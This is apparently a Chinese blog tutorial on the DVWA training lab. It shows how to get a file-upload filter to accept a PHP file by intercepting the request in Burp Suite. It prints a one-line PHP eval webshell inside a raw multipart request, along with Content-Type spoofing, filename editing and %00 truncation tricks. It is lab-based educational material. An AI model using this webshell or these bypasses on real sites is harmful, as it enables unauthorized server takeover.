通过截取http请求绕过前端javascript验证进行文件上传

截取HTTP请求

​ 很多网站为了减少服务器端的压力,在后台方面减少验证,而只在web前端使用Javascript进行验证,殊不知这样大大增加了安全隐患。在渗透测试中经常会进行HTTP请求的截取来发现一些隐秘的漏洞。例如:绕过Javascript验证、发现隐藏标签内容等。
在本文中我使用DVWA靶场中的文件上传漏洞中级,来进行前端验证的绕过。

1、搭建靶场

1)安装phpstudy集成环境
下载地址:https://www.xp.cn/
在这里插入图片描述
2)搭建DVWA靶场
在这里插入图片描述
3)用php写个一句话木马用来获取webshll
在这里插入图片描述

2、进入靶场开始绕过

1)我们先直接上传木马看看能否成功
在这里插入图片描述
在这里插入图片描述
可以看到上传失败,下方红色提示:您的图片未上传。我们只能接受 JPEG 或 PNG 图像。
因为我上传的木马是.php格式的,它对文件格式做了过滤只允许.jpeg或.png文件上传。
2)我们用burpsuite抓包看看他的请求包是怎样的
在这里插入图片描述

100000
------WebKitFormBoundary9vBhdeU4CHZbAh1Z
Content-Disposition: form-data; name="uploaded"; filename="test.php"
Content-Type: application/octet-stream

<?php @eval($_POST[369]);?>
------WebKitFormBoundary9vBhdeU4CHZbAh1Z
Content-Disposition: form-data; name="Upload"

Upload
------WebKitFormBoundary9vBhdeU4CHZbAh1Z--

通过burp抓包分析,它通过" Content-Type"这个属性来判断是否为规定上传的文件格式。那我们修改这个格式为image/jpeg上传
在这里插入图片描述
上传成功并且返回了上传文件的路径
在这里插入图片描述

在这里插入图片描述

3、其他方法

1)上传文件名是"123.jpeg"的文件,随后在burp里面修改文件名,而不用修改" Content-Type "的内容,也可以实现文件上传。
2)在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时,可以在文件名中使用%00截断。

上面这两种方法我都尝试过,都可以成功,之后的步骤就是使用蚁剑或菜刀连接了,我就不写了,主要目的是通过截取http请求绕过前端javascript验证,这种方法很实用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

迷失的黑色精灵

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值